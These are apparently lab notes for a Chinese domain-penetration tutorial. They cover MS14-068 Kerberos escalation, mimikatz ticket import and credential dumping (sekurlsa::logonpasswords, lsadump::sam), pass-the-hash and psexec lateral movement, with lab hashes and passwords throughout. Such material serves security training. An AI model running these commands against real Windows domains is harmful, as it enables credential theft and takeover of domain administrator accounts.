域渗透入门(二)

参考资料

录制的视频教程

域渗透实践篇(二)

  1. 域信息搜集
  2. ms14-068 域普通用户提权到域管理员

域渗透实践篇(三)

  1. pass the hash票据传递攻击

Kerberos域用户提权漏洞ms14-068

准备域内普通用户权限(以及DC未打补丁)

  1. 域控添加一个user用户

  2. 192.168.1.3 计算机添加user用户

    1
    2
    3
    4
    5
    net user user admin!@#45      #添加一个用户user,添加密码
    ---
    注销管理员用户,登陆用户user
    用户名:SRV-WEB-KIT\user
    密码:admin!@#45

  3. 测试域普通用户与域管理员区别

  4. 生成高权限票据

    1
    2
    3
    4
    python ms14-068.py -u whale@0day.org -s  S-1-5-21-1812960810-2335050734-3517558805-1178 -d 192.168.1.131 -p qwe123$%
    需要普通域用户名称
    普通域用户sid
    普通域用户明文密码或者hash

  5. mimikatz导入hash

    1
    2
    3
    4
    mimikatz.exe
    kerberos::list			#列出内存中的票据信息
    kerberos::purge         #清除内存中的票据信息
    kerberos::ptc TGT_whale@rootkit.org.ccache(生成的高权限票据全名)	#导入高权限票据到内存,获得域管理员权限

    票据传递

1
2
3
4
5
6
7
8
9
10
11
12
13
mimikatz_command -f sekurlsa::logonPasswords
导出登陆的密码

python /usr/share/doc/python-impacket/examples/psexec.py Administrator@192.168.1.2 cmd.exe

使用密码admin!@#45,成功连接

使用ntlm hash,ccef208c6485269c20db2cad21734fe7,连接失败

有两种可能 
1. 工具psexec.py,只能使用明文密码连接
2. hash出错,不是ccef208c6485269c20db2cad21734fe7, 而是其他hash
3. windows 2012 R2不支持pass the hash

NT hash、LM hash、NTLM hash

LM hash的全名LAN Manager Hash,容易被破解。因此windows visa与winSever2008之后的版本默认禁用了LM hash。
NTLM hash取代了LM hash,安全性更高,从windowsSever2003开始,默认使用NTLM hash。

所说的NT hash就是NTLM hash,有些文档这么称呼,我还以为是两种不同的加密方式,只是称呼不同而已。

mimikatz提权ntlm hash

1
2
3
mimikatz.exe
log
lsadump::sam /sam:sam.hiv /system:sys.hiv

查看DC机器与Web机器的hash是否一致

1
2
3
4
5
6
7
8
修改web机器密码:net user administrator qwe123$%
保持这个密码与DC一致

DC (192.168.1.131): 4b211aa32bcd009f4d46f52438fe433d
WEB(192.168.1.130):4b211aa32bcd009f4d46f52438fe433d

privilege::debug
sekurlsa::pth /user:administrator /domain:0day.org /ntlm:4b211aa32bcd009f4d46f52438fe433d
1
2
mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt
一行命令,将结果保存到log.txt
1
2
sekurlsa::logonpasswords
dir \\OWA2010SP3\C$